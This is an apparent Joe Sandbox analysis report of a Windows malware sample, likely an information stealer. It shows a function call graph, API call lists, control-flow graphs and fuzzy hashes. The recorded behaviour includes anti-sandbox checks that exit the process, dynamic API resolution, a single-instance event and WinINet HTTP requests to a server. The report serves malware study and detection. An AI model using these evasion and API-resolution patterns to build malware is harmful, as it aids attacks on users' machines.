26305->26306 26307 fb4d0b 26305->26307 26306->26307 26308 fb4d2f lstrcpy 26307->26308 26309 fb4d3b 26307->26309 26308->26309 26310 fb4d6d lstrcpy 26309->26310 26311 fb4d79 26309->26311 26310->26311 26312 fb4dac InternetOpenA StrCmpCA 26311->26312 26313 fb4da0 lstrcpy 26311->26313 26314 fb4de0 26312->26314 26313->26312 26315 fb54b8 InternetCloseHandle CryptStringToBinaryA 26314->26315 26520 fd3e70 26314->26520 26317 fb54e8 LocalAlloc 26315->26317 26333 fb55d8 26315->26333 26318 fb54ff CryptStringToBinaryA 26317->26318 26317->26333 26319 fb5529 lstrlen 26318->26319 26320 fb5517 LocalFree 26318->26320 26321 fb553d 26319->26321 26320->26333 26323 fb5563 lstrlen 26321->26323 26324 fb5557 lstrcpy 26321->26324 26322 fb4dfa 26325 fb4e23 lstrcpy lstrcat 26322->26325 26326 fb4e38 26322->26326 26328 fb557d 26323->26328 26324->26323 26325->26326 26327 fb4e5a lstrcpy 26326->26327 26329 fb4e62 26326->26329 26327->26329 26330 fb558f lstrcpy lstrcat 26328->26330 26331 fb55a2 26328->26331 26332 fb4e71 lstrlen 26329->26332 26330->26331 26334 fb55d1 26331->26334 26336 fb55c9 lstrcpy 26331->26336 26335 fb4e89 26332->26335 26333->25341 26334->26333 26337 fb4e95 lstrcpy lstrcat 26335->26337 26338 fb4eac 26335->26338 26336->26334 26337->26338 26339 fb4ed5 26338->26339 26340 fb4ecd lstrcpy 26338->26340 26341 fb4edc lstrlen 26339->26341 26340->26339 26342 fb4ef2 26341->26342 26343 fb4efe lstrcpy lstrcat 26342->26343 26344 fb4f15 26342->26344 26343->26344 26345 fb4f36 lstrcpy 26344->26345 26346 fb4f3e 26344->26346 26345->26346 26347 fb4f65 lstrcpy lstrcat 26346->26347 26348 fb4f7b 26346->26348 26347->26348 26349 fb4fa4 26348->26349 26350 fb4f9c lstrcpy 26348->26350 26351 fb4fab lstrlen 26349->26351 26350->26349 26352 fb4fc1 26351->26352 26353 fb4fcd lstrcpy lstrcat 26352->26353 26354 fb4fe4 26352->26354 26353->26354 26355 fb500d 26354->26355 26356 fb5005 lstrcpy 26354->26356 26357 fb5014 lstrlen 26355->26357 26356->26355 26358 fb502a 26357->26358 26359 fb5036 lstrcpy lstrcat 26358->26359 
26360 fb504d 26358->26360 26359->26360 26361 fb5079 26360->26361 26362 fb5071 lstrcpy 26360->26362 26363 fb5080 lstrlen 26361->26363 26362->26361 26364 fb509b 26363->26364 26365 fb50ac lstrcpy lstrcat 26364->26365 26366 fb50bc 26364->26366 26365->26366 26367 fb50da lstrcpy lstrcat 26366->26367 26368 fb50ed 26366->26368 26367->26368 26369 fb510b lstrcpy 26368->26369 26370 fb5113 26368->26370 26369->26370 26371 fb5121 InternetConnectA 26370->26371 26371->26315 26372 fb5150 HttpOpenRequestA 26371->26372 26373 fb518b 26372->26373 26374 fb54b1 InternetCloseHandle 26372->26374 26527 fd7310 lstrlen 26373->26527 26374->26315 26378 fb51a4 26535 fd72c0 26378->26535 26381 fd7280 lstrcpy 26382 fb51c0 26381->26382 26383 fd7310 3 API calls 26382->26383 26384 fb51d5 26383->26384 26385 fd7280 lstrcpy 26384->26385 26386 fb51de 26385->26386 26387 fd7310 3 API calls 26386->26387 26388 fb51f4 26387->26388 26389 fd7280 lstrcpy 26388->26389 26390 fb51fd 26389->26390 26391 fd7310 3 API calls 26390->26391 26392 fb5213 26391->26392 26393 fd7280 lstrcpy 26392->26393 26394 fb521c 26393->26394 26395 fd7310 3 API calls 26394->26395 26396 fb5231 26395->26396 26397 fd7280 lstrcpy 26396->26397 26398 fb523a 26397->26398 26399 fd72c0 2 API calls 26398->26399 26400 fb524d 26399->26400 26401 fd7280 lstrcpy 26400->26401 26402 fb5256 26401->26402 26403 fd7310 3 API calls 26402->26403 26404 fb526b 26403->26404 26405 fd7280 lstrcpy 26404->26405 26406 fb5274 26405->26406 26407 fd7310 3 API calls 26406->26407 26408 fb5289 26407->26408 26409 fd7280 lstrcpy 26408->26409 26410 fb5292 26409->26410 26411 fd72c0 2 API calls 26410->26411 26412 fb52a5 26411->26412 26413 fd7280 lstrcpy 26412->26413 26414 fb52ae 26413->26414 26415 fd7310 3 API calls 26414->26415 26416 fb52c3 26415->26416 26417 fd7280 lstrcpy 26416->26417 26418 fb52cc 26417->26418 26419 fd7310 3 API calls 26418->26419 26420 fb52e2 26419->26420 26421 fd7280 lstrcpy 26420->26421 26422 fb52eb 26421->26422 26423 fd7310 3 API calls 26422->26423 26424 
fb5301 26423->26424 26425 fd7280 lstrcpy 26424->26425 26426 fb530a 26425->26426 26427 fd7310 3 API calls 26426->26427 26428 fb531f 26427->26428 26429 fd7280 lstrcpy 26428->26429 26430 fb5328 26429->26430 26431 fd72c0 2 API calls 26430->26431 26432 fb533b 26431->26432 26433 fd7280 lstrcpy 26432->26433 26434 fb5344 26433->26434 26435 fb537c 26434->26435 26436 fb5370 lstrcpy 26434->26436 26437 fd72c0 2 API calls 26435->26437 26436->26435 26438 fb538a 26437->26438 26439 fd72c0 2 API calls 26438->26439 26440 fb5397 26439->26440 26441 fd7280 lstrcpy 26440->26441 26442 fb53a1 26441->26442 26443 fb53b1 lstrlen lstrlen HttpSendRequestA InternetReadFile 26442->26443 26444 fb549c InternetCloseHandle 26443->26444 26448 fb53f2 26443->26448 26446 fb54ae 26444->26446 26445 fb53fd lstrlen 26445->26448 26446->26374 26447 fb542e lstrcpy lstrcat 26447->26448 26448->26444 26448->26445 26448->26447 26449 fb5473 26448->26449 26450 fb546b lstrcpy 26448->26450 26451 fb547a InternetReadFile 26449->26451 26450->26449 26451->26444 26451->26448 26453 fc8ccd 26452->26453 26454 fc8cc6 ExitProcess 26452->26454 26455 fc8ee2 26453->26455 26456 fc8dbd StrCmpCA 26453->26456 26457 fc8ddd StrCmpCA 26453->26457 26458 fc8dfd StrCmpCA 26453->26458 26459 fc8e1d StrCmpCA 26453->26459 26460 fc8e3d StrCmpCA 26453->26460 26461 fc8d5a lstrlen 26453->26461 26462 fc8e56 StrCmpCA 26453->26462 26463 fc8d30 lstrlen 26453->26463 26464 fc8e6f StrCmpCA 26453->26464 26465 fc8e88 lstrlen 26453->26465 26466 fc8d84 StrCmpCA 26453->26466 26467 fc8da4 StrCmpCA 26453->26467 26468 fc8d06 lstrlen 26453->26468 26469 fc8ebb lstrcpy 26453->26469 26455->25343 26456->26453 26457->26453 26458->26453 26459->26453 26460->26453 26461->26453 26462->26453 26463->26453 26464->26453 26465->26453 26466->26453 26467->26453 26468->26453 26469->26453 26470->25349 26471->25351 26472->25357 26473->25359 26474->25365 26475->25367 26476->25373 26477->25377 26478->25383 26479->25385 26480->25389 26481->25403 26482->25407 26483->25406 26484->25402 
26485->25406 26486->25424 26487->25409 26488->25410 26489->25414 26490->25420 26491->25421 26492->25427 26493->25434 26494->25436 26495->25460 26496->25464 26497->25463 26498->25459 26499->25463 26500->25473 26503 fb161f 26502->26503 26504 fb162b lstrcpy 26503->26504 26505 fb1633 26503->26505 26504->26505 26506 fb164d lstrcpy 26505->26506 26507 fb1655 26505->26507 26506->26507 26508 fb166f lstrcpy 26507->26508 26509 fb1677 26507->26509 26508->26509 26510 fb1699 26509->26510 26511 fb1691 lstrcpy 26509->26511 26510->26195 26511->26510 26513 fd71e6 26512->26513 26514 fd71fc lstrcpy 26513->26514 26515 fd2860 26513->26515 26514->26515 26515->25338 26517 fb4bd0 26516->26517 26517->26517 26518 fb4bd7 ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI lstrlen InternetCrackUrlA 26517->26518 26519 fb4c41 26518->26519 26519->26303 26521 fd3e83 26520->26521 26522 fd3e9f lstrcpy 26521->26522 26523 fd3eab 26521->26523 26522->26523 26524 fd3ecd lstrcpy 26523->26524 26525 fd3ed5 GetSystemTime 26523->26525 26524->26525 26526 fd3ef3 26525->26526 26526->26322 26529 fd732d 26527->26529 26528 fb519b 26531 fd7280 26528->26531 26529->26528 26530 fd733d lstrcpy lstrcat 26529->26530 26530->26528 26532 fd728c 26531->26532 26533 fd72b4 26532->26533 26534 fd72ac lstrcpy 26532->26534 26533->26378 26534->26533 26537 fd72dc 26535->26537 26536 fb51b7 26536->26381 26537->26536 26538 fd72ed lstrcpy lstrcat 26537->26538 26538->26536 26562 fd31f0 GetSystemInfo wsprintfA 26555 fb5869 57 API calls 26574 fc1269 408 API calls 26565 fd2d60 11 API calls 26591 fd2b60 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 26592 fda280 __CxxFrameHandler 26563 fc01d9 126 API calls 26566 fc3959 244 API calls 26540 fd2cd0 GetUserDefaultLocaleName LocalAlloc CharToOemW 26556 fd2853 lstrcpy 26557 fce049 147 API calls 26580 fc8615 48 API calls 26593 fc8615 49 API calls 26541 fd3cc0 GetProcessHeap RtlAllocateHeap wsprintfA lstrcpy 26581 fd33c0 GetProcessHeap RtlAllocateHeap GlobalMemoryStatusEx wsprintfA 26572 fb16b9 200 API calls 
26575 fbf639 144 API calls 26594 fbbf39 177 API calls 26569 fd3130 GetProcessHeap RtlAllocateHeap RegOpenKeyExA RegQueryValueExA RegCloseKey 26582 fcabb2 120 API calls 26583 fc23a9 298 API calls 26598 fc4b29 303 API calls 26577 fb8e20 malloc strcpy_s free std::exception::exception 26542 fd30a0 GetSystemPowerStatus 26564 fd29a0 GetCurrentProcess IsWow64Process 26584 fbdb99 631 API calls 26544 fd749e 6 API calls ctype 26559 fd8819 free free malloc free __getptd 26545 fc2499 290 API calls 26585 fc8615 47 API calls 26570 fd4e35 9 API calls 26599 fb7710 free ctype 26561 fd2c10 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation wsprintfA 26586 fd938d 129 API calls 3 library calls 26600 fbb309 98 API calls 26546 fc8c88 16 API calls 26547 fd2880 10 API calls 26548 fd4480 OpenProcess GetModuleFileNameExA CloseHandle lstrcpy 26549 fd3480 6 API calls 26573 fd3280 7 API calls
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FB4C7F
                                  • lstrcpy.KERNEL32(00000000,00FDCFEC), ref: 00FB4CD2
                                  • lstrcpy.KERNEL32(00000000,00FDCFEC), ref: 00FB4D05
                                  • lstrcpy.KERNEL32(00000000,00FDCFEC), ref: 00FB4D35
                                  • lstrcpy.KERNEL32(00000000,00FDCFEC), ref: 00FB4D73
                                  • lstrcpy.KERNEL32(00000000,00FDCFEC), ref: 00FB4DA6
                                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00FB4DB6
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                   • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Similarity
                                  • API ID: lstrcpy$InternetOpen
                                  • String ID: "$------
                                  • API String ID: 2041821634-2370822465
                                  • Opcode ID: af19d9435a820c548937823e24e7af58a6902f515abaa3afaf2f12b0da565778
                                  • Instruction ID: 453fde12f8e561a3561f256e584ed3cb380473daf638b5c77a71e9070bc45bf6
                                  • Opcode Fuzzy Hash: af19d9435a820c548937823e24e7af58a6902f515abaa3afaf2f12b0da565778
                                  • Instruction Fuzzy Hash: 81525E31D0121A9BDB21EFA5DC45BEE77BAAF44720F194025F905AB241DB38ED41EFA0

                                   Control-flow Graph
                                  control_flow_graph 2125 fd6390-fd63bd GetPEB 2126 fd65c3-fd6623 LoadLibraryA * 5 2125->2126 2127 fd63c3-fd65be call fd62f0 GetProcAddress * 20 2125->2127 2129 fd6638-fd663f 2126->2129 2130 fd6625-fd6633 GetProcAddress 2126->2130 2127->2126 2132 fd666c-fd6673 2129->2132 2133 fd6641-fd6667 GetProcAddress * 2 2129->2133 2130->2129 2134 fd6688-fd668f 2132->2134 2135 fd6675-fd6683 GetProcAddress 2132->2135 2133->2132 2136 fd66a4-fd66ab 2134->2136 2137 fd6691-fd669f GetProcAddress 2134->2137 2135->2134 2139 fd66ad-fd66d2 GetProcAddress * 2 2136->2139 2140 fd66d7-fd66da 2136->2140 2137->2136 2139->2140
                                  APIs
                                  • GetProcAddress.KERNEL32(74DD0000,01B92230), ref: 00FD63E9
                                  • GetProcAddress.KERNEL32(74DD0000,01B924E8), ref: 00FD6402
                                  • GetProcAddress.KERNEL32(74DD0000,01B92248), ref: 00FD641A
                                  • GetProcAddress.KERNEL32(74DD0000,01B924A0), ref: 00FD6432
                                  • GetProcAddress.KERNEL32(74DD0000,01B98F88), ref: 00FD644B
                                  • GetProcAddress.KERNEL32(74DD0000,01B85790), ref: 00FD6463
                                  • GetProcAddress.KERNEL32(74DD0000,01B857B0), ref: 00FD647B
                                  • GetProcAddress.KERNEL32(74DD0000,01B92500), ref: 00FD6494
                                  • GetProcAddress.KERNEL32(74DD0000,01B92278), ref: 00FD64AC
                                  • GetProcAddress.KERNEL32(74DD0000,01B92290), ref: 00FD64C4
                                  • GetProcAddress.KERNEL32(74DD0000,01B922A8), ref: 00FD64DD
                                  • GetProcAddress.KERNEL32(74DD0000,01B859D0), ref: 00FD64F5
                                  • GetProcAddress.KERNEL32(74DD0000,01B922C0), ref: 00FD650D
                                  • GetProcAddress.KERNEL32(74DD0000,01B92320), ref: 00FD6526
                                  • GetProcAddress.KERNEL32(74DD0000,01B85A90), ref: 00FD653E
                                  • GetProcAddress.KERNEL32(74DD0000,01B923C8), ref: 00FD6556
                                  • GetProcAddress.KERNEL32(74DD0000,01B92338), ref: 00FD656F
                                  • GetProcAddress.KERNEL32(74DD0000,01B856B0), ref: 00FD6587
                                  • GetProcAddress.KERNEL32(74DD0000,01B923E0), ref: 00FD659F
                                  • GetProcAddress.KERNEL32(74DD0000,01B85810), ref: 00FD65B8
                                  • LoadLibraryA.KERNEL32(01B92590,?,?,?,00FD1C03), ref: 00FD65C9
                                  • LoadLibraryA.KERNEL32(01B92548,?,?,?,00FD1C03), ref: 00FD65DB
                                  • LoadLibraryA.KERNEL32(01B92560,?,?,?,00FD1C03), ref: 00FD65ED
                                  • LoadLibraryA.KERNEL32(01B925A8,?,?,?,00FD1C03), ref: 00FD65FE
                                  • LoadLibraryA.KERNEL32(01B92578,?,?,?,00FD1C03), ref: 00FD6610
                                  • GetProcAddress.KERNEL32(75A70000,01B925C0), ref: 00FD662D
                                  • GetProcAddress.KERNEL32(75290000,01B925D8), ref: 00FD6649
                                  • GetProcAddress.KERNEL32(75290000,01B92518), ref: 00FD6661
                                  • GetProcAddress.KERNEL32(75BD0000,01B92530), ref: 00FD667D
                                  • GetProcAddress.KERNEL32(75450000,01B85A70), ref: 00FD6699
                                  • GetProcAddress.KERNEL32(76E90000,01B98FC8), ref: 00FD66B5
                                  • GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 00FD66CC
                                  Strings
                                  • NtQueryInformationProcess, xrefs: 00FD66C1
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                   • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Similarity
                                  • API ID: AddressProc$LibraryLoad
                                  • String ID: NtQueryInformationProcess
                                  • API String ID: 2238633743-2781105232
                                  • Opcode ID: 5e22682f9081b65df04d8f6eaf81a8acbed3421da75482fc4ccefdb0bbaf124e
                                  • Instruction ID: 10dca368ce16892f2c605541d256d4ab119096cd0ba92f81395af5fbef58c88e
                                  • Opcode Fuzzy Hash: 5e22682f9081b65df04d8f6eaf81a8acbed3421da75482fc4ccefdb0bbaf124e
                                  • Instruction Fuzzy Hash: AEA171F5A012089FC77CDFE5E548A263BFDF7886583848539E926CB348D734A980DB60

                                   Control-flow Graph
                                   control_flow_graph 2141 fd1bf0-fd1c0b call fb2a90 call fd6390 2146 fd1c0d 2141->2146 2147 fd1c1a-fd1c27 call fb2930 2141->2147 2148 fd1c10-fd1c18 2146->2148 2151 fd1c29-fd1c2f lstrcpy 2147->2151 2152 fd1c35-fd1c63 2147->2152 2148->2147 2148->2148 2151->2152 2156 fd1c6d-fd1c7b GetSystemInfo 2152->2156 2157 fd1c65-fd1c67 ExitProcess 2152->2157 2158 fd1c7d-fd1c7f ExitProcess 2156->2158 2159 fd1c85-fd1ca0 call fb1030 call fb10c0 GetUserDefaultLangID 2156->2159 2164 fd1cb8-fd1cca call fd2ad0 call fd3e10 2159->2164 2165 fd1ca2-fd1ca9 2159->2165 2171 fd1ccc-fd1cde call fd2a40 call fd3e10 2164->2171 2172 fd1ce7-fd1d06 lstrlen call fb2930 2164->2172 2165->2164 2166 fd1cb0-fd1cb2 ExitProcess 2165->2166 2171->2172 2183 fd1ce0-fd1ce1 ExitProcess 2171->2183 2178 fd1d08-fd1d0d 2172->2178 2179 fd1d23-fd1d40 lstrlen call fb2930 2172->2179 2178->2179 2181 fd1d0f-fd1d11 2178->2181 2186 fd1d5a-fd1d7b call fd2ad0 lstrlen call fb2930 2179->2186 2187 fd1d42-fd1d44 2179->2187 2181->2179 2184 fd1d13-fd1d1d lstrcpy lstrcat 2181->2184 2184->2179 2193 fd1d7d-fd1d7f 2186->2193 2194 fd1d9a-fd1db4 lstrlen call fb2930 2186->2194 2187->2186 2188 fd1d46-fd1d54 lstrcpy lstrcat 2187->2188 2188->2186 2193->2194 2195 fd1d81-fd1d85 2193->2195 2199 fd1dce-fd1deb call fd2a40 lstrlen call fb2930 2194->2199 2200 fd1db6-fd1db8 2194->2200 2195->2194 2197 fd1d87-fd1d94 lstrcpy lstrcat 2195->2197 2197->2194 2206 fd1ded-fd1def 2199->2206 2207 fd1e0a-fd1e0f 2199->2207 2200->2199 2202 fd1dba-fd1dc8 lstrcpy lstrcat 2200->2202 2202->2199 2206->2207 2208 fd1df1-fd1df5 2206->2208 2209 fd1e16-fd1e22 call fb2930 2207->2209 2210 fd1e11 call fb2a20 2207->2210 2208->2207 2211 fd1df7-fd1e04 lstrcpy lstrcat 2208->2211 2215 fd1e24-fd1e26 2209->2215 2216 fd1e30-fd1e66 call fb2a20 * 5 OpenEventA 2209->2216 2210->2209 2211->2207 2215->2216 2218 fd1e28-fd1e2a lstrcpy 2215->2218 2228 fd1e8c-fd1ea0 CreateEventA call fd1b20 call fcffd0 2216->2228 2229 fd1e68-fd1e8a CloseHandle Sleep OpenEventA 2216->2229 2218->2216 2233 fd1ea5-fd1eae CloseHandle ExitProcess 2228->2233 2229->2228 2229->2229
                                  APIs
                                    • Part of subcall function 00FD6390: GetProcAddress.KERNEL32(74DD0000,01B92230), ref: 00FD63E9
                                    • Part of subcall function 00FD6390: GetProcAddress.KERNEL32(74DD0000,01B924E8), ref: 00FD6402
                                    • Part of subcall function 00FD6390: GetProcAddress.KERNEL32(74DD0000,01B92248), ref: 00FD641A
                                    • Part of subcall function 00FD6390: GetProcAddress.KERNEL32(74DD0000,01B924A0), ref: 00FD6432
                                    • Part of subcall function 00FD6390: GetProcAddress.KERNEL32(74DD0000,01B98F88), ref: 00FD644B
                                    • Part of subcall function 00FD6390: GetProcAddress.KERNEL32(74DD0000,01B85790), ref: 00FD6463
                                    • Part of subcall function 00FD6390: GetProcAddress.KERNEL32(74DD0000,01B857B0), ref: 00FD647B
                                    • Part of subcall function 00FD6390: GetProcAddress.KERNEL32(74DD0000,01B92500), ref: 00FD6494
                                    • Part of subcall function 00FD6390: GetProcAddress.KERNEL32(74DD0000,01B92278), ref: 00FD64AC
                                    • Part of subcall function 00FD6390: GetProcAddress.KERNEL32(74DD0000,01B92290), ref: 00FD64C4
                                    • Part of subcall function 00FD6390: GetProcAddress.KERNEL32(74DD0000,01B922A8), ref: 00FD64DD
                                    • Part of subcall function 00FD6390: GetProcAddress.KERNEL32(74DD0000,01B859D0), ref: 00FD64F5
                                    • Part of subcall function 00FD6390: GetProcAddress.KERNEL32(74DD0000,01B922C0), ref: 00FD650D
                                  • lstrcpy.KERNEL32(00000000,00FDCFEC), ref: 00FD1C2F
                                  • ExitProcess.KERNEL32 ref: 00FD1C67
                                  • GetSystemInfo.KERNEL32(?), ref: 00FD1C71
                                  • ExitProcess.KERNEL32 ref: 00FD1C7F
                                    • Part of subcall function 00FB1030: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00FB1046
                                    • Part of subcall function 00FB1030: VirtualAllocExNuma.KERNEL32(00000000), ref: 00FB104D
                                    • Part of subcall function 00FB1030: ExitProcess.KERNEL32 ref: 00FB1058
                                    • Part of subcall function 00FB10C0: GlobalMemoryStatusEx.KERNEL32 ref: 00FB10EA
                                    • Part of subcall function 00FB10C0: ExitProcess.KERNEL32 ref: 00FB1114
                                  • GetUserDefaultLangID.KERNEL32 ref: 00FD1C8F
                                  • ExitProcess.KERNEL32 ref: 00FD1CB2
                                  • ExitProcess.KERNEL32 ref: 00FD1CE1
                                  • lstrlen.KERNEL32(01B99028), ref: 00FD1CEE
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FD1D15
                                  • lstrcat.KERNEL32(00000000,01B99028), ref: 00FD1D1D
                                  • lstrlen.KERNEL32(00FE4B98), ref: 00FD1D28
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FD1D48
                                  • lstrcat.KERNEL32(00000000,00FE4B98), ref: 00FD1D54
                                  • lstrlen.KERNEL32(00000000), ref: 00FD1D63
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FD1D89
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00FD1D94
                                  • lstrlen.KERNEL32(00FE4B98), ref: 00FD1D9F
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FD1DBC
                                  • lstrcat.KERNEL32(00000000,00FE4B98), ref: 00FD1DC8
                                  • lstrlen.KERNEL32(00000000), ref: 00FD1DD7
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FD1DF9
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00FD1E04
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                   • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Similarity
                                  • API ID: AddressProc$Process$Exitlstrcpy$lstrcatlstrlen$AllocCurrentDefaultGlobalInfoLangMemoryNumaStatusSystemUserVirtual
                                  • String ID:
                                  • API String ID: 3366406952-0
                                  • Opcode ID: 0a8b795519f75f1b6b844b7aecd0c0a4a56c24988078418afc08f804f7039746
                                  • Instruction ID: 66b7747f0249c1bee73df4a610112e09a1df18cec0f7e14be9b2111bff226851
                                  • Opcode Fuzzy Hash: 0a8b795519f75f1b6b844b7aecd0c0a4a56c24988078418afc08f804f7039746
                                  • Instruction Fuzzy Hash: 1671B331900219ABDB74ABF1DC49BAE7BFFBF40715F080025F9169A285DB38D841EB61

                                   Control-flow Graph
                                  control_flow_graph 2850 fb4a60-fb4afc RtlAllocateHeap 2867 fb4b7a-fb4bbe VirtualProtect 2850->2867 2868 fb4afe-fb4b03 2850->2868 2869 fb4b06-fb4b78 2868->2869 2869->2867
                                  APIs
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00FB4AA2
                                  • VirtualProtect.KERNEL32(00000000,00000004,00000100,?), ref: 00FB4BB0
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                   • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmp
